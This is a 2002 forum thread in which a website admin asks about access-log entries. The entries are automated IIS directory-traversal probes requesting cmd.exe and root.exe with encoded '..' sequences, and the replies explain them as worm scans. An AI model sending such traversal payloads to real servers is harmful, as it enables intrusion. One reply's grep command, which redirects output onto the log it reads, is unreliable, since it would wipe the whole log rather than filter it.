What's going on here? 2

[bingoldsby]

Every few minutes I'm getting something like what I've pasted below from my access.log. This has been happening for quite a few days and has now gotten to be about the only thing I see in the log. Please help me to understand what's going on, if it's something I can and should take action against, and why me? The last few day's of this kind of activity has been almost solely from this IP.

Thanks, Brian

216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 289
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
216.187.243.69 - - [27/Jan/2002:01:12:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
216.187.243.69 - - [27/Jan/2002:01:12:24 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313

 

[maxit]

Your being scanned for attack...that is a hacker looking for a vunerability
on your system. Block the IP address and probably the last part of the class C
Suggest blocking something like this 216.187.243.0 this means deny access to
your entire system from this IP class. If the guy is dynamic he will just hit you with another number of the IP class C if you just block .69

have fun!

Maxit

 

[bingoldsby]

Hi Maxit,

I was able to come up with a domain name accociated with the IP number and sent a notification of this activity to the support address which was listed on the page.

This morning, I got back a response suggesing that it was possibly a code red or nimda operating on one of their customers computers. I was asked to send along a sample of my server log. I did - 6 pages of it.

Last night I set several ip addresses with restrictions past "htdocs" directory. Your suggestion goes a bit further, does it? I don't want to upset things too much. For instance; our own static ip address starts with 216.187 - and I wouldn't want to cut us off by mistake.

Please explain your zero at the end a bit further. Also, this morning, I still see that ip address showing up in the log, just with a different server status code - "403" instead of 404. You mention, "deny access to your entire system." What about that?

If it's an automated thing and not stopped, I suppose I'll see those accesses still showing up no matter what I do. I haven't noticed anything going wrong here at our site, but I'm holding my breath a bit.

Thanks again, Brian

 

[Crundy]

Don't worry about them, they are requests trying to use the IIS directory traversal exploit, which does not affect Apache servers.

If you are getting upset about the requests in your logs, do an inverse grep for cmd.exe and root.exe and send the output back to the original file C:\DOS:>
C:\DOS:>RUN
RUN DOS RUN!!

 

[bingoldsby]

Huh?

It seems that when I had Apache start sending them back a different 400's message, most of them caught on that I had caught on and stopped the probes. However, as I am new to web hosting, and, as the internet is full-time connect, and there are web, mail, dns, ftp, and vnc servers directly connected to our organizations lan... well, yes, I am worried. Probably the best thing to be, considering all the mischief going on.

As far as grep, etc, goes - you lost me.

Thanks, Brian

 

[Crundy]

Grepping:

Do this in your apache logfile directory:

grep -vi root.exe logfile | grep -vi cmd.exe >logfile

replacing 'logfile' with the name of your logfile (usually access_log)

This will delete all the requests from your log. C:\DOS:>
C:\DOS:>RUN
RUN DOS RUN!!

 

[bingoldsby]

In Apache Win32 ?

I think I understand now. Sorry for not mentioning the Win32 thing. The log entries are ok. I probably need them as they are to learn from.

Thanks, Brian

 

[SpeedDemon]

I suggest getting Black Ice firewall running on your machine. Its a great nimble little firewall thats been protecting my network for some time.

It catches SOOO many exploits its unbelibaled, for instance, did you know that by playing Quake3 online opens you up to a hack... mmmm, you do know.

Black Ice is great, it catches hackers in the act, blocks there access and allows you to stealth your machine to there particulat IP.

I;ve caught many https attacks, TCP packet overflows, dodgy connection strings etc,

Try it.

Regards